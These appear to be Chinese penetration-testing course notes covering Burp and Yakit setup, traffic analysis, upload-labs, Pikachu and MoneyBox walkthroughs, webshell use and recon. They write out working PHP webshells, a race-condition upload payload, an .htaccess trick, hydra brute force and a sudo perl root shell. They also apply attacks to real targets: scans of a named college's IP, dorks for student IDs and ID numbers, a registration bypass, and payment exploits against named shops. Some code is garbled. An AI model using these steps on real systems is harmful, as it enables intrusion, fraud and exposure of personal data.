Burp,Yakit导入证书

Burp导入证书

1.首先要把Burp Suite的CA证书下载到本地,让火狐浏览器开了127.0.0.1:8080代理才可以下载证书，也就是要让Burp Suite能抓到浏览器的http包的情况下，才能访问到 https://burp。

2.打开下图浏览器代理插件，新建情景模式，协议，服务器，端口按Burp中的修改，改成图中的样子。然后开启代理

3.访问https://burp，下载证书

4.在浏览器的设置中搜索证书

5.导入CA证书，勾选两个信任。

6.在火狐浏览器访问百度https://www.baidu.com/，观察Burp的历史记录，发现Burp可以抓到https的包了！

Yakit导入证书

1.打开Yakit,先点高级配置，再点证书下载。

2.接下来的步骤与Burp的4~6步相同，不再赘述。

流量分析（考试题）

流量走向图

分析

• 浏览器请求http的数据包，yakit的监听端口8083（可改），Burp的监听端口8080（可改）监听到数据包并抓取，流量从浏览器到Yakit和Burp，再到Clash，最终通过节点出去。

• 爬虫程序中的代理部分，和.exe文件的流量，通过Proxifier代理软件，转到Clash的节点出去。

• Wireshark是一款网络协议分析工具，它主要工作在网络层及以上的层级。具体来说，Wireshark可以分析的数据包范围包括：

  网络层：如IPv4、IPv6等协议的数据包。
  传输层：如TCP、UDP等协议的数据包。
  数据链路层：如PPP、HDRC、ARP协议的数据包
  应用层：如HTTP、HTTPS、FTP、SMTP、DNS等应用层协议的数据包。

皮卡包分析

1.下载老师的114.pcapng（抓的蚁剑的包）。输入过滤命令：(ip.src_host==192.168.2.114 or ip.dst_host==192.168.2.114) and http，然后按下图操作

2.红色部分代表发出，蓝色部分代表返回

3. 介绍了在线加密和解密网站 https://icyberchef.com/ to Base64—加密 from—解密
   
   4.把下图1过程左边的URL拖到下图的位置，把之前的全部红色部分复制到右上框，在另外一个网页访问 https://icyberchef.com/ 把2过程的from base64拖到下图位置，把红色部分的最后一行复制有上框，在右上框从第一个字符一个一个删，直至得到操作者的命令。
   

5.下载老师的db.pcapng（抓sqlmap的包）输入过滤命令：(ip.src_host==192.168.2.70 or ip.dst_host==192.168.2.70) and http，然后和之前的步骤一样，追踪流-——>到解码网站解码

6.对上图的解码出的sql语句分析，获取第9个字符，判断他是否大于1，大于1则返回true,小于1则返回false，下图是比较第8行和第9行的不同。

四大webshell管理工具

蚁剑（AntSword）： 蚁剑是一款开源的WebShell客户端，支持多种编程语言和平台。其主要功能包括文件管理、数据库管理、虚拟终端等。蚁剑的特点是具有强大的插件系统，可以扩展其功能。此外，蚁剑的流量特征较为明显，容易被安全设备识别。
菜刀（Chopper）： 菜刀是一款经典的WebShell管理工具，具有文件管理、数据库管理、虚拟终端等功能。菜刀的流量特征较为明显，通常会被安全设备识别。菜刀的Webshell通常使用一句话木马，执行函数如@eval、@assert等。
哥斯拉（Godzilla）： 哥斯拉是一款功能强大的Webshell权限管理工具，支持多种类型的Shell，包括PHP、JSP、ASP等。哥斯拉的特点是全部类型的Shell都能绕过市面上的大部分静态查杀和流量WAF。此外，哥斯拉还具有流量加密功能，可以绕过大部分的流量检测。哥斯拉还自带插件，如冰蝎、蚁剑等，可以实现更多的功能。
冰蝎（Behinder）： 冰蝎是一款动态二进制加密的Webshell管理客户端，主要基于Java开发，因此可以跨平台使用。冰蝎的特点是客户端基于Java，兼容性较好。冰蝎的Webshell通常使用Base64加密，以避免被检测。其流量特征较为明显，容易被安全设备识别。

扫描端口

1.下载AttackMachine镜像，打开AttackMachine虚拟机。打开桌面的武器库中的Nmap-
Zenmap GUI，输入命令：nmap -p- 192.168.2.197

扫描目录

打开御剑后台扫描工具，在域名处输入http：//192.168.2.197:27689/ 开始扫描

登录文件上传系统

1.在武器库的浏览器访问192.168.2.197:27689

2.因为之前扫到了robots.txt文件，尝试打开另一个网页访问192.168.2.197/robots.txt
发现有两个文件，但没有什么用

3.用kali来扫目录，输入命令dirsearch -u http://192.1682.197:27689 -x 403

发现config.js，config.js 是一个配置文件，它在各种应用程序中用于存储配置设置。这个文件通常包含了应用程序运行所必需的设置，如数据库连接信息、API密钥、服务端口、环境变量等。访问/js/config.js

发现是一些编码，没有什么用。
4.访问default.aspx。发现还是登录页面

5.访问/web.config.bak。发现弹出一个窗口。尝试保存config.bak文件。

6.用记事本打开config.bak文件，发现用户名：down 密码：downsql 把这两记录下来。

7. 然后尝试去登录文件上传系统，发现登不进去。然后我们去思考扫描出来的开放的1433端口，sqlserver数据库的默认端口号正是1433端口。我们尝试去连接sqlserver数据库。下图是常见数据库默认端口，必记。
   

8.打开武器库的Navicat,连接sqlserver。


填写用户名：down 密码：downsql

9.找到用户列表userLists，发现admin和他的密码

10.然后去登录admin, 登陆成功，获得第一个key

上传木马

1.找到文件上传，翻到第三页，发现文件过长会被截取，因为这是一个aspx网站，所以我们要找一个aspx木马上传。

2.在武器库中找到aspx木马，找到名称为一句话木马的文件。

3.因为这个木马文件拖不出来，右击它并用cmd打开，用python写web程序。输入命令python -m Simple HttpServer 80 运行这个命令后， Python 解释器将启动 SimpleHTTPServer 服务，并且默认会在当前工作目录下提供一个 HTTP 服务。

4.在主机的浏览器访问AttackMachine虚拟机的ip地址，然后下载木马文件。并把这个文件重命名为123defgh.jpg

5.上传木马成功。

连接蚁剑

1..然后去找木马的路径，右击这个木马文件，复制链接到另一个网页，删木马名称的几个字母，一般让浏览器访问不到这个文件，它就会报错，显示木马的路径。

2.复制木马的路径到kali的蚁剑，密码为abcd,连接蚁剑。

3.在蚁剑的文件里找到了Kay2！

xpcmd_shell提权

1.在config.bak文件里发现了新数据库：FileManage 新用户名sa，新密码cisp pte@sa 所以我们尝试去Navicat去连接并登录这个数据库（属于SQLserver数据库）。

2.新建查询，目的是使用命令，实现远程桌面连接。

3.在主机的搜索框内输入rdp,以管理员身份运行 远程桌面连接。

4.在新建的查询中改用户名和密码。

5.重新去实现远程桌面连接，登陆靶机桌面成功，获得最后的key3

文件上传漏洞

介绍

文件上传漏洞是发生在有上传功能的应用中,如果应用程序对用户的上传文件没有控制或者存在缺陷,攻击者可以利用应用上传功能存在的缺陷，上传木马病毒等有危害的文件到服务器上面，控制服务器。
文件上传漏洞产生的主要原因是:应用中存在上传功能,但是上传的文件没有经过严格的合法性检验或者检验函数存在缺陷，导致可以上传木马文件到服务器。文件上传漏洞危害极大因为可以直接上传恶意代码到服务器上，可能会造成服务器的网页篡改、网站被挂马、服务器被远程控制、被安装后门等严重的后果。

目录

webshell的编写

webshell的含义

webshell通常被称为匿名用户（入侵者）通过网站端口对网站服务器的某种程度上操作的权限。它大多以动态脚本的形式存在，因此也有人称之为网站的后门工具。

webshell的编写

 在vscode创建一个.php文件，编写木马程序。下面是一个简单的木马

1
2

<?php @system($_GET[a]);
?>

这段代码接受一个名为a的GET参数，并使用@system函数执行该参数指定的命令。

upload-labs靶场闯关

upload-labs靶场的介绍

介绍：一个使用php语言编写的，专门收集渗透测试和CTF中遇到的各种 上传漏洞 的靶场。

第1关

1.下载upload-labs-master压缩包，将其解压到小皮的根目录下。
2.开启小皮的apache,关闭小皮的mysql

3.在主机vscode中编写木马程序命名为1.php，把1.php复制到虚拟机的桌面

1
2
3

<?php
@system($_GET[a]);
?>

4.在小皮，打开网站，进入第一关，F12关掉js,然后上传1.php

4.右键复制图片链接到另一个网页，在网址后面加上?a=whoami 或
?a=systeminfo 成功截图如下

第2关

1.查看代码，发现上传的文件必须是jpeg，png，gif类型

2.上传1.php后，用Yakit抓包，改为手动劫持，把16行改为image/jpeg，在点击自动放行。

3.右键复制图片链接到另一个网页，在网址后面加上?a=whoami 或
?a=systeminfo

第3关

1.查看代码，发现后缀 .asp .aspx .php .jsp 全被禁了

2.把木马1.php重命名为1.php5，在虚拟机浏览器访问192.168.2.197。
3.之后的步骤和第一关一样。

第4关

1.在vscode创建并编写 .htaccess文件,.htaccess文件是Apache服务器的一个配置文件，它允许网站管理员在服务器配置文件（通常是httpd.conf）之外，为特定目录及其子目录设置独立的配置指令

1
2
3

<FilesMatch "3.jpg">
SetHandler application/x-httpd-php                    //这个指令为匹配模式的文件设置处理器为PHP引擎。换句话说，它告诉Apache将名为“3.jpg”的文件作为PHP脚本处理，而不是静态图像文件。
</FilesMatch>

2.把 .htaccess 移到虚拟机桌面
3.再把木马重命名为3.jpg
4.先上传.htaccess文件，再上传3.jpg
5.右键复制图片链接到另一个网页，在网址后面加上?a=dir 成功截图如下

第18关

1.查看代码，第18行服务器删除当前目录文件。原理是这样的：服务器删文件。
向服务器不断发送上传木马请求的包，不断发送访问木马的包，服务器删不过来，个别木马被上传。若服务器性能好，则木马不能上传成功。

2.重新编写木马程序

1
2
3
4
5

<?php

fputs(fopen('../p.php','w'),'<?php @system($_GET[a]); ?>')

?>

3.先上传一张正常的图片10.jpg，右键复制图像链接。

4.打开Burp,把复制的图像链接后面的2024011xxxx.jpg改为2.php,然后粘贴到Burp的内置浏览器，再抓包

5.把抓到的包发送到intruder,得到访问木马的包。

6.接下来，去抓上传木马的包，选择2.php，点击下图箭头处的上传，把抓到的上传木马的包发送到intruder

  7.  3和4都改成无限发包，3是上传，4是访问。
      ![image.png](https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704891390603-d307cab2-7d08-4aa6-9430-2678af922b0f.png)
8.  3和4的线程都改成50
    ![image.png](https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704891573291-56a2dfc0-500d-40fe-b6fc-bebf4988967f.png)         
    9.点击Burp的开始攻击。结果如下
    ![Image.png](https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704981839385-21f5a2ff-1095-4412-93b6-dc5715616b2d.png)
    10.复制Request中的选中的部分，粘贴到upload/的后面并访问。
    ![Image.png](https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704981891067-8a5b9687-887f-4f1a-826a-337cfbc4a084.png)

蚁剑工具的使用

蚁剑工具的介绍

蚁剑（AntSword）是一款被设计用于网络攻击的远程控制工具，它能够使得攻击者获取受害计算机的远程控制权限。蚁剑通过在受害者计算机上植入恶意软件，创建一个“后门”，使攻击者可以未经授权地访问受害者系统，进行数据窃取、监控、操纵等一系列非法操作。

蚁剑工具的使用

1.重新编写木马2.php

1
2
3

<?php
  @ecal($_post[a]);
?>

2.kali自带蚁剑工具，双击AntSword

3.右击空白处，添加数据。

4.按下图填写URL地址和连接密码。点击测试链接。

5.连接靶机成功，可以对靶机上的文件进行操作。

CDN介绍及绕过

支付逻辑漏洞

含义

支付逻辑漏洞是指系统的支付流程中存在业务逻辑层面的漏洞,支付漏洞是 高风险漏洞 也属于 逻辑漏洞，通常是通过 篡改价格、数量、状态、接口、用户名等传参，从而造成 小钱够买大物 甚至可能造成 0元购买商品 等等，凡是 涉及购买、资金等方面的功能处 就有可能存在支付漏洞。

支付流程

选择商品和数量——选择支付及配送方式——生成订单编号——订单支付选择——完成支付。如：最常见的支付逻辑漏洞通常是由于服务器端没有对客户端请求数据中的金额、数量等敏感信息进行效验导致。一般漏洞产生在电子商务类应用中,这里是以贝锐的商城进行举例的。

类别

支付过程中可以修改支付金额2.可以将订单中的商品数量修改为负值。3.请求重放导致4.其他问题（程序异常，其他参数修改导致问题等）其他支付问题补充：修改支付状态、修改附属值（优惠券积分等）、修改支付接口、替换多个订单、重复支付等。5.发票越权,并发,也可能也能修改金额。

测试方法与修复方法

支付逻辑漏洞之修改订单数量：1、登录网站，选择购买一个商品并抓取数据包。2、找到其中代表商品数量的参数，将参数的值修改为负数,或者修改商品的pid。3、发送数据包，生成订单，观察订单是否有效，是否能进入支付页面。4、完成支付。可以从这4个方面的每一步单独入手验证是否存在漏洞。
举例
（1）登录贝锐的商城发现以下7个漏洞:
实现零元购:1.参数包里面没有价格，或者价格跟商品id校验，导致无法修复商品金额。2.掩藏商品的模糊测试，商品id，换参数包直接改。出现第1个的原因主要是商品下单的处导致。出现第2个的原因主要是商品购买处导致。3.购物单未校验加入零元购商品。第3个主要是支付宝接口和商品接口未校验导致商品任意购买。6.商品数量校验导致零元购。7.附带商品导致支付漏洞主要是在免费的商品或者增送的商品上做文章,可能通过修改它们的数量从而产生漏洞。
（2）通过支付宝和微信的校验缺点对某一个文库进行充值:
8.四舍五入导致支付漏洞 系统支付和微信的支付校验导致(提现) 0.009可以变成0.01进行充值界面的抓包,将0.01改成0.009。
这里微信和支付宝对支付的金额进行了校验,但是只到了小数点的第二位,如果出现第三位会采用四舍五入的方法强行进行校验。

芒果书城的漏洞

存在一个修改数量价格就会变化的漏洞,被修复了,还存在一个修改书籍数量就能绕过的一个漏洞,被修复了。4.贝锐微商城:使用过红包的订单，有一个支付宝的订单号，有效期是15分钟，商家对接支付宝，取消订单，红包返回，无限使用

并发需要用到插件,并发之后看长度。并发漏洞(服务器对功能点的多线程处理)：优惠劵，微薄的点赞，关注，取消点赞 优惠商品下单 所有的都能并发。修复方法：1.在请求数据中对对涉及金额、数量等敏感信息进行加密，保证加密算法不可猜解。并在服务器端对其进行校验。2.支付交易请求数据中加入tbken，防止重放攻击。3.支付系统需要实施严格的安全措施，例如验证支付请求的合法性、限制重复支付、验证用户身份、使用加密技术保护数据传输等。此外，定期进行安全审计和漏洞扫描，及时修复发现的漏洞也是重要的措施。4.对于用户而言，保护个人账户安全、使用安全的支付平台、谨慎处理退款请求等也是重要的预防措施。

Fiddler的使用

下载流程:https://blog.csdn.net/Mubei1314/article/details/122389950Fiddler抓包联动burp进行数据分析:https://mp.weixin.qq.com/s?__biz=MzU2NDM2OTQxMw==&mid=2247484054&idx=1&sn=3440b36b071491a9b7a03e1e293aab57&chksm=fc4d43fccb3acaea94fd6073cba7f68efad9ba21177694ec7599d99cb7330ffa7edf01f80002&scene=27使用过程中不要关代理。

教育SRC分析

1.教育SRC的含义：教育SRC（Security Response Center，安全响应中心）是针对教育行业的一种网络安全实践。它主要是指一个组织或机构，专门负责收集、处理和响应网络安全相关的漏洞报告。在教育领域，许多学校和教育机构都设有自己的教育SRC，以便于管理和保护教育系统免受网络攻击和信息安全威胁

2.教育漏洞报告平台,是专门为教育行业设计的在线系统，用于收集、管理和响应网络安全漏洞。
链接：https://dev.src.sjtu.edu.cn/

挖洞思路

• 教育SRC（学校）
• 公益SRC（白嫖）
• 挖漏洞（注入，逻辑漏洞，信息收集一下，子域名收集）
• 挖洞学校的漏洞（所有）——>信息收集——>学校
• 挖到某个学校的漏洞——>学校——>信息收集

挖洞举例

以西安医学院为例
1.谷歌搜索语法：

1
2
3

inurl:edu 学号
inurl:edu 初始密码
inurl:学号|身份证|电话|工号 filetype:pdf|xls|doc|xlxs

2.搜索语句：domain="xiyi.edu.cn" 可以得到一些子域名和ip地址

以及官网真实ip地址:59.75.117.201
3.在kali用nmap扫描59.75.117.201，命令：nmap 59.75.117.201

4.依次访问59.75.117.201：上图端口 如59.75.117.201：80 寻找漏洞
5.任意用户注册，任意用户登录漏洞
（1）首先，先用一个正常手机号注册，正常填写手机号，验证码。随便填一个身份证号，登录，用Burp抓包

（2） 然后，把返回的包记录下来

1

{"success":true}

（3）再随便注册一个手机号。手机号，验证码，身份证随便填

（4）再用Burp抓包，把下图中圈记的内容替换成之前记录的{“success”:true}

（5）发现直接可以注册登录了

弱口令漏洞

含义

弱口令漏洞是指系统登录口令的设置强度不高，容易被攻击者猜到或破解。造成弱口令漏洞的主要原因是系统的运维人员、管理人员安全意识不足。
弱口令：弱口令我们可以简单的理解为能让别人随便就猜出的密码。

弱口令猜测

1
2
3
4
5
6

admin/admin123
admin/admin123456
admin/123456
admin/12345678
admin/admin666
admin/admin888

信息收集网站

企查查的介绍

1.企查查是中国的一款企业信息查询工具，用户可以通过该平台查询到企业的基本信息、主要人员、对外投资、法律诉讼等多个维度的信息。企查查为用户提供了一个相对全面和便捷的方式来了解企业的情况，无论是对于企业本身、合作伙伴还是竞争对手。
链接：https://www.qcc.com/

信息收集工具

ping

1.可以通过kali的ping命令获取ip地址

dig

 命令`dig qq.com`     dig是DNS解析工具，这个命令可以查看qq.com的A记录

nslookup

nslookup qq.com 也可以获取ip地址

OneForAll

OneForAll是一款开源的子域收集工具，下载链接：https://github.com/shmilylty/OneForAll 然后粘贴到虚拟机

virustotal

virustotal是检测上传的文件是否是木马的网站，链接https://www.virustotal.com/gui/home/upload

小米范

1.前提：
使用环境是在java1.8的环境中进行运行。
2.下载：
web_finder_2.9.jar这是小米范的原文件。
3.使用：
找到安装java1.8的安装路径，将web_finder_2.9.jar放入java1.8的bin目录之下。

在java1.8的bin目录处输入cmd输入java -jar web_finder_2.9.jar，之后就可以启动你的小米范了。之后新建扫描，输入IP就可以了，这里简单的输入了两个ip地址
可以对表单中数据进行处理。
4.举例：
fofa的使用：以sql-labs为例用浏览器打开到sqli目录下查看网页源码，找到”POST- Dump into outfile - String”用浏览器打开fofa使用body语法进行搜索。

如果是会员可以进行下载称之为多元组数据。

直接右键将ip进行复制粘贴到小米范查看ip的存活情况。

全塞入这里进行扫描：

结果:

通过标题和状态码进行简单的筛选然后导出：

基于表单的暴力破解

Burp的使用

1.从老师那下载pikachu-master（皮卡丘靶场）的压缩包，将其移到虚拟机win10的phpstudy（小皮）的根目录下并解压。在小皮中打开网站，点击皮卡丘。
2.进入第一关：基于表单的暴力破解。
3.启动Burp,打开内置浏览器，把第一关的网址复制到内置浏览器，在表单的用户框和密码框中分别填入admin admin

4.看Burp的HTTP历史记录,找到post请求的数据包，右键发送到Intruder。

5.在Intruder中，下图的1过程改成集束炸弹，再点击2过程的清除payload的位置，3过程选中横线处，添加payload位置。

6.点击位置旁边的payload，按下图添加admin

7.在payload集选择2，然后在手动添加已知的真实密码123456，从下图的的从列表中添加密码。

8.点击右上角的开始攻击，结果如下，35077和其他的长度有很大不同，爆出密码123456
注意，已知真实密码123456爆破出密码123456，这个只是测试的过程。

Yakit的使用

1.免配置启动，清空历史请求，打开内置浏览器，把皮卡丘的第一关的网址复制到内置浏览器，在表单中输入admin admin。

2.看历史记录，抓到了post数据包，点击下图的的FUZZ

3.点击首页–>点击首页里的payload–>查看字典 （注意：可以在这里添加字典）

4.返回web Fuzzer，删除两个admin，右键插入模糊测试字典，选择对应的字典。


5.点击发送请求，再点击响应大小，均发送成功，发现有一个响应大小34695，与其他不同，爆出密码为123456

验证码绕过（on server）

Yakit的使用

1.由自动放行改为手动劫持，把第二关的网址复制到内置浏览器，填入admin admin 以及验证码。抓到数据包，右击界面发送到Web Fuzzer

2.与之前的操作一样插入字典，发送请求，最后点自动放行。

验证码绕过（on client）

1.键入F12–>点击三个点–>设置–>勾选 禁用js

2.后面的步骤和第二关验证码绕过（on server）一样了，不再赘述。

攻破靶机的环境搭建

靶机moneybox安装和设置

1.下载并安装Oracle VM VirtualBox，链接：https://www.virtualbox.org/
下载moneybox.ova镜像，链接：https://download.vulnhub.com/moneybox/MoneyBox.ova
2.打开virtualBox,依次点击管理–>导入虚拟电脑–>找到moneybox.ova的安装路径，导入。

3.右击红色图标的靶机，网络–>选择仅主机–>选择virtualBox Host-Only Ethernet Adapter–>点击OK。
–>高级–>查看靶机物理地址，并记住FF86

4.USB设备–>选择USB1.1–>点击OK

5.双击红色图标的靶机，启动。启动成功截图如下

kali机设置

1.右击kali机，设置–>添加网络适配器2–>网络适配器设置为桥接，网络适配器2设置为NAT–>点击确定

2.打开kali机，在命令窗口输入ifconfig，可查找到网卡eth0和eth1的ip地址。

3.依次输入下面的命令

1
2
3

  ifdown eth0                                 //关闭接口
ifup eth0                                    //重启接口
arp-scan -l -I eth0                         //在指定的网络接口 eth0 上执行ARP扫描。ARP扫描用于通过发送ARP请求并收集响应来发现本地网络上的设备

得知靶机的ip地址为192.168.56.101

攻破靶机moneybox

扫描端口

1.输入命令nmap -p- 192.168.56.101
结果如下： 扫到21,22,80端口开放

2.向21,22,80端口发送请求，查看21,22,23端口状态
命令nmap -p 21,22,80 -sC 192.168.56.101

FTP协议的利用

命令

1
2
3

ftp 192.168.56.101                                //ftp连接到192.168.56.101
ls                                                //查看内容
help                                              //查看帮助命令

获取trytofind.jpg

1.命令：

1
2
3

ftp> get trytofind.jpg                                //获取图片
ftp> exit                                            //退出ftp

2.查看图片，没发现任何信息

3.看看二进制文件
strings trytofind.jpg
使用以上的命令查看.jpg .exe .txt等文件，电脑都是以二进制的文件呈现的，而二进制是泛指的，不是指具体的0,1。二进制转化为十六进制字符，看字符比较容易理解。

一般图片不会有红色箭头指的一行括号，可能图片藏东西了。

获取隐藏文件

1.安装steghide apt install steghide

2. 查看隐藏文件 steghide info trytofind.jpg 发现确实有隐藏文件，但缺少一个密钥

扫描目录

1.命令：dirsearch -u 192.168.56.101 -x 403 结果扫到一个目录blogs，然后去访问http://192.168.56.101/blogs/

2.右键检查网页，寻找信息。在查看器的最后一行，发现了另一个目录S3cr3t-T3xt

3.访问http://192.168.56.101/S3cr3t-T3xt 同样的操作，发现了密钥key 3xtr4ctd4t4

4.命令

1
2

steghide  extract -sf trytofind.jpg                //提取隐藏文件
cat data.txt                                       //看隐藏文件data.txt

5.data.txt中的内容为 你好。。。雷诺
我告诉你一些重要的事，你的密码太弱了，请更改您的密码不要低估它。。。。。。。

爆破密码

6.说明renu密码是弱密码，开始用hydra爆破他的密码，命令如下:

1
2
3
4

hydra -h
cd Desktop  
hydra -l renu -P ./1 ssh://192.168.56.101                  //  1是桌面新建的文件，文件里是自建的密码字典

爆出用户名：renu 密码：987654321

获取第一个flag

1.ssh登录 ssh renu@192.168.0.129
ls 查看文件
cat user1.txt 查看user1.txt

获取第二个flag

1.查看renu用户的输入命令历史记录
cat .bash_history

2.发现renu远程登录了用户lily的电脑。所以我们尝试去登录lily用户
ssh lily@192.168.56.101

登录成功！
3.输入以下命令：

1
2
3

ls
cat user2.txt

获取第三个flag

1.命令

1
2
3
4
5
6

sudo -l                                      //显示当前用户可以执行的命令列表
sudo perl -e 'exec "/bin/sh";'
id                                          //显示用户id,组id
# cd /root
# ls -al
# cat .root.txt

第二个命令需要去GTFOBins 网站（GTFOBins 是一个开源项目，旨在为渗透测试人员和安全研究人员提供一个易于使用的工具）寻找
（1）在该网站的搜索框搜索perl（perl是脚本语言）点击第2个箭头的perl，找到sudo

（2）复制sudo下面的命令，粘贴到kali

域名

含义

又称网域，是由一串用点分隔的名字组成的互联网上某一台计算机或计算机组的名称，用于在数据传输时对计算机的定位标识。

法律

1.国家保护公民、法人和其他组织依法使用网络的权利，促进网络接入普及，提升网络服务水平，为社会提供安全、便利的网络服务，保障网络信息依法有序自由流动。
任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉 和利益，煽动颠覆国家政权、推翻社会主义制度，煽动分裂国家、破坏国家统一，宣扬恐怖主义、极端主义，宜扬民族仇恨、民族歧视，传播暴力、淫秽色情信息，编造、传播虚假信息扰乱经济秩序和社会秩序，以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。

2.[非法侵入计算机信息系统罪]违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。

[非法获取计算机信息系统数据、非法控制计算机信息系统罪]违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金;情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

[提供侵入、非法控制计算机信息系统程序、工具罪]提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。

单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照各该款的规定处罚。

分类

• 一级域名

一级域名是域名体系中最右边的部分，它通常代表了一个域名的类别或国家。比如在 baidu.com 中，.com 就是顶级域名

• 二级域名（根域）

二级域名位于顶级域名之前，它通常代表了一个组织或机构。在 baidu.com 中，baidu 就是二级域名，表示具体的商业实体。

• 三级域名

三级域名位于二级域名之前，用于进一步细分组织内的不同部门或服务。例如，在 baidu.com 中，可以有 news.baidu.com，这里的 news 就是三级域名，表示百度公司下的新闻部门。
子域名
子域名是三级域名的一个特例，它通常用于指定主机的角色或服务类型，比如 www、mail、ftp 等。在 baidu.com 中，www.baidu.com 中的 www 就是子域名

子域名获取

域名挖掘网站

1.子域名爆破网站链接：http://z.zcjun.com/
2.使用：以湖南信息学院 hnuit.edu.cn 为例，将这个网址填入下图框内，点击提交。

复制爆出来的任一子域名，并在浏览器访问。结果如下，如果访问的每一个子域名都跳到同一页面，说明遇到泛解析了。注意：泛解析的作用是防爆破。
3. FOFA 搜索引擎 链接 https://fofa.info/toLogin
首先注册登录，查询湖南信息学院hnuit.edu.cn 结果如下

4.360网路空间测绘 https://quake.360.net/quake/#/index
注册登录，查询湖南信息学院hnuit.edu.cn 结果如下

5. 奇安信 https://hunter.qianxin.com/
   注册登录，查询湖南信息学院hnuit.edu.cn 结果如下
   

域名挖掘工具

Layer子域名挖掘机4.2纪念版 提取链接：https://pan.baidu.com/s/1VQ2HLocs39B72ElysskPog 提取码：121I
下图的1框中填入baidu.com,线程最好改成50或100，如果线程全速，路由器可能会瘫痪。最后点击启动，稍等一会，出现百度的子域名。

百度和谷歌搜索语法

百度语法

1.在浏览器安装屏蔽广告插件
2.seo的含义：汉译为搜索引擎优化。是一种方式：利用搜索引擎的规则提高网站在有关搜索引擎内的自然排名。目的是让其在行业内占据领先地位，获得品牌收益。
3.语法
（1）增加相关资料，下图是增加知乎的内容

（2）减少相关内容，下图是减少CSDN的内容

谷歌语法

1.“”英文双引号中的内容作为一个整体被搜索; 精确匹配搜索

2. mac* 搜索出mac有关的所有字符
   
3. “tencent.com” 马化腾 filetype:pdf
   

   4.   inurl:	把搜索范围限定在url链接中       "hnuit.edu.cn" inurl:id
         ![image.png](https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704287110703-ca77c953-765d-4f1f-8ad4-cb0b5558d862.png)
        5.Index  of	可以帮助你寻找网络和FTP目录          index  of mp3
        ![image.png](https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1704287288409-a273dfde-07e4-4279-b989-093690af8309.png)
        6.详细谷歌语法
      

|
| inanchor: | 把搜索范围限定在链接锚文本文字中 | inanchor:吴清源 |
| anchor: | 检索某一作者/发明人的论著; 只在Google Scholar中可用 | anchor:/作者: |
| link： | 检索所有链接到某个特定URL网址的网页;只能单独使用 | link:163.com |
| cache: | Google网页快照 |

|
| related： | 检索与某特定网页类似的网页 | related:www.163.com/index.shtml |
| info: | 用来显示与某链接相关的一系列搜索; 提供cache、similar-pages、link、related等连接 | info:www.sina.com.cn |
| Index of | 可以帮助你寻找网络和FTP目录 | index of mp3 |
| daterange: | 查找在一定的日期或者一定的日期范围内; 只关注被Google收录的时间 |

|
| location: | 指定地区区域内查询关键词相关的网页 | wow gold location:France |
| weather: | 查询该地区或城市当前的天气状况 | weather:北京 |
| stocks: | 查询股票信息; 一般源于专业财经网站 | stocks:比亚迪 |
| define: | 返回包含查询关键词定义的网面 | define: 暗网 |
| 注意:关键词与命令之间有一个空格;在这些关键字中;请勿在冒号后面接空格;命令需用英文输入,包括冒号。AND、OR、NOT均应大写,而其他算符必须是小写，虽其对检索词完全不区分大小写 | | |

Google高级搜索
http://www.google.com.hk/advanced_search
Google网页搜索帮助中心
https://support.google.com/websearch/?hl=zh-Hans
谷歌分类目录
http://directory.google.com/
Google对于检索词中的大小写是完全不做区分的;在Google中，检索词的排序方式对于整个检索式具有重要的影响，它将首先匹配按照检索式给出的次序进行搜索。同时它也将优先匹配检索词相互邻接的网页。GOOGLE支持多达132种语言，包括简体中文和繁体中文，可以设置页面语言和搜索语言，可对汉字繁简体进行转换，可以跨语言搜索。Google搜索结果中可对搜索范围进行限制，如：网页的发布更新时间或一个时间段内，搜索结果的类型选择如图片、视频、书籍、应用程序、新闻。

基本流程

渗透整体分为三部分：前渗透也被称为外网打点，权限维持以及后渗透，权限维持也可划分到前渗透中。权限维持也包括提权，主机信息收集web打点，apk打点(安卓手机打点)，钓鱼等等最终目的都是为了获得权限。结构示意图：

web打点

信息收集分情况进行处理：已知ip，已知域名，已知邮箱。

已知ip

基于主机

可以进行端口扫描，从而确定端口对应的服务，一共有65536(0~65535)个端口。浏览器也是如此，在浏览器上每开启一个页面都要在本地建立端口于远端服务器进行连接。在web服务(浏览器)上就可以进行目录扫描，通过目录扫描发现信息泄露，如果没有进行校验还会发生越权或者目录穿越。web服务上面还会发现ssh，ftp，smb，RDP，寻找API(可能存在is之中)，根据ico图标找相关站点等服务，其中的密码都可以进行爆破。简单的用户名和密码，组织统一注册的用户名和密码，历史密码拼接容易被爆破。还可以进行强制爆破。以上种种情况基于主机。

反查

根据ip地址反查域名通过微步在线进行反查通过在微步进行服务器ip地址的查询可以看到绑定的图标以及ip解析的域名，相关网站，网页的js以及ip开饭的端口等信息均可以查到。根据图标也可能会被查到相关信息。微步在线X情报社区-威胁情报查询威胁分析平台开放社区

2.1.3ip定位

已知域名

域名

举个简单的例子：www.baidu.com就是域名域名（Domain Name）是用于在互联网上标识和定位网站或互联网资源的人类可读的地址。它是将IP地址（用于在网络上唯一标识设备）转化为易于记忆的字符序列的方式。域名的结构通常由多个部分组成，以点（.）作为分隔符。最顶层的部分被称为顶级域名（Top-Level Domain，简称TLD），如.com、.org、.net等。顶级域名可以按照国家/地区（如.cn表示中国）、通用（如.com表示商业）、组织类型（如.edu表示教育机构）等进行分类。在顶级域名下面，可以添加二级域名和更多级别的子域名。域名的作用是方便用户记忆和使用，它提供了一个更友好和可读性更高的方式来访问网站和互联网资源，而不是依赖于记忆一长串数字的IP地址。当用户在浏览器中输入域名时，系统将通过域名解析将其转换为相应的IP地址，以便正确访问目标资源。

域名备案

